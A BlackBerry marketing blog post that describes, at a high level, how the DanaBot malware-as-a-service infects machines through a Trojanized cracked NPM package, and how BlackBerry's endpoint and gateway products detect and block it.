BlackBerry Prevents: DanaBot Malware
Sold as a Malware-as-a-Service (MaaS) offering, DanaBot initially focused on banking fraud and information stealing. However, over the years it has matured in complexity and grown in functionality. One such functional shift was seen in late October 2021, when an affiliate using the malware dropped via the hijacked NPM packages was involved in a distributed denial-of-service (DDoS) attack against a commercial organization based in Russia.
To see how BlackBerry prevents DanaBot attacks from occurring, check out the following video, and watch BlackBerry go head-to-head with a live sample of DanaBot malware.
DEMO VIDEO: BlackBerry vs. DanaBot MaaS
Learn more about DanaBot in our deep dive blog, Threat Thursday: DanaBot’s Evolution from Bank Fraud to DDoS Attacks
Demo Video: Step by Step
In this video, we demonstrate how DanaBot compromises a system. For the purposes of this demonstration, we have configured our machine in Audit-Only mode to allow for malware execution.
Here’s how things normally play out. The would-be victim downloads the RC package, a popular NPM component, which comes as a .zip file that would typically be downloaded from a malicious website as a “cracked,” or free, version of the component.
But nothing good in life ever comes for free. The cracked version is Trojanized, bundled with DanaBot executables.
Upon extraction of the contents of the .zip file, an installation script called “compile.bat” initiates DanaBot installation, and attempts to download the malicious payload via a command line window. Once downloaded, it executes the compile.dll file that effectively compromises the system and puts it into the hands of whichever threat actor has purchased the DanaBot Malware-as-a-Service.
How BlackBerry Stops DanaBot
Let’s investigate this incident with two key BlackBerry® solutions: BlackBerry® Protect and BlackBerry® Optics. BlackBerry Protect is an endpoint protection product that uses our Cylance® AI machine learning model to stop threats before they can execute, providing pre-execution protection. It stops the malicious DLL before it can compromise the system.
BlackBerry Protect also provides full details on the malicious file’s properties, with an exhaustive list of threat indicators identifying anomalies, collection, and destruction capabilities.
BlackBerry Optics gives you full transparency into the attempted system compromise. With BlackBerry Optics, you can conduct automated root-cause analysis where you can clearly see the chain of activities conducted by the user — from the web browser used to access and download the malicious .zip file, to the installation script execution. You can also see the system components used to download and register the malicious DLL into the system.
Using BlackBerry Optics, you can identify the source domain for this attack and visualize all the related network interactions.
A third product, BlackBerry® Gateway, can sense and stop this type of malicious network activity by blocking the traffic based on IP reputation, effectively preventing the installation script from getting the malicious payload from the Internet. Using BlackBerry Gateway, the administrator of the affected system can quickly look into the event and obtain all the relevant data they need to see where the attack came from, and why BlackBerry products activated to stop the attack before it began.
Our Prevention-First Philosophy
At BlackBerry, we take a prevention-first and AI-driven approach to cybersecurity. Putting prevention first neutralizes malware before the exploitation stage of the kill chain.
By stopping malware at this stage, BlackBerry solutions help organizations increase their resilience. It also helps to reduce infrastructure complexity and streamline security management, ensuring your business, people and endpoints are secure.